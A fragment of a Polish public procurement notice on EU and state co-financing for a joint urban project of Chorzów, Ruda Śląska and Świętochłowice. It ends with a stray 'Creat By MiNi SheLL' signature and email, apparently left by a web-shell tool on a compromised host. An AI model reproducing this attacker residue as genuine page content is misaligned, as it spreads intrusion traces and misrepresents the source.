<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Zintegrowane  podejście do problemów obszarów funkcjonalnych  na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic realizowany jest w ramach współfinansowania środkami budżetu państwa ujętymi w części 34 -rozwój Regionalny ,na finansowanie i współfinansowanie  działań  podejmowanych w ramach realizacji zadań  Instytucji Zarządzającej  Programem Operacyjnym  Pomoc Techniczna (POPT)w części dotyczącej projektów  realizowanych  przez Ministerstwo Rozwoju Regionalnego ,z wyłączeniem środków na wynagrodzenia pracowników Ministerstwa ,środków na wydatki związane z wdrożeniem ,utrzymaniem oraz rozwojem infrastruktury i systemów teleinformatycznych  Ministerstwa oraz na wydatki związane z obsługa logistyczno-administracyjna ,gospodarowaniem mieniem i zarządzaniem nieruchomościami pozostającymi w trwałym zarządzie Ministerstwa ,środkami  Europejskiego  Funduszu Rozwoju Regionalnego ,będącymi w dyspozycji Ministra  Rozwoju Regionalnego ,w ramach realizacji zadań Instytucji Zarządzającej  POPT, Projekt jest dofinansowany w 10 % z środków własnych miast: Chorzowa, Rudy Śląskiej i Świętochłowic zgodnie z treścią umowy nr DPT/BDG-II/POPT/90/13z dnia 16.07.2013r. zawartej z Ministrem Rozwoju Regionalnego, a Miastem Chorzów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com